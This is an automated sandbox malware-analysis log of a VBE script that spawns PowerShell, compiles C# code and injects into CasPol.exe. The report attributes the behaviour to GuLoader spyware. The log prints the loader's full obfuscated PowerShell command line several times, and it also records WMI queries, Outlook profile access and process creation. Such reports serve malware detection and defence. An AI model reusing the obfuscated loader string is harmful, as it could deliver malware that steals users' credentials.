UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FAAB6 AdjustTokenPrivileges, 17_2_1D5FAAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D5FAA7F AdjustTokenPrivileges, 17_2_1D5FAA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zft31ohr.hmb.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.pdb source: powershell.exe, 00000004.00000002.1687266902.0000000004531000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00C5CF89 pushad ; ret 4_2_00C5CF95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C677C7 push es; ret 4_2_07C67810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C625D3 push esp; iretd 4_2_07C625D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6D5A0 push es; ret 4_2_07C6D5B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C61CA3 push eax; retf 4_2_07C61CA9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C67B91 push es; ret 4_2_07C67BA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C67A9E push es; ret 4_2_07C67AB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07C6E8B0 push es; ret 4_2_07C6E8C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBCDA1 push es; retf 0007h 4_2_07CBCDA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBF579 push esp; ret 4_2_07CBF57D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBE4D0 push ss; retf 0007h 4_2_07CBE4D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CBE4F1 push ss; retf 0007h 4_2_07CBE4F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CB7348 push esp; iretd 4_2_07CB7351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3C9B0 push es; ret 4_2_07D3CC90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3BCF1 push es; ret 4_2_07D3BD00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07D3CC82 push es; ret 4_2_07D3CC90
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
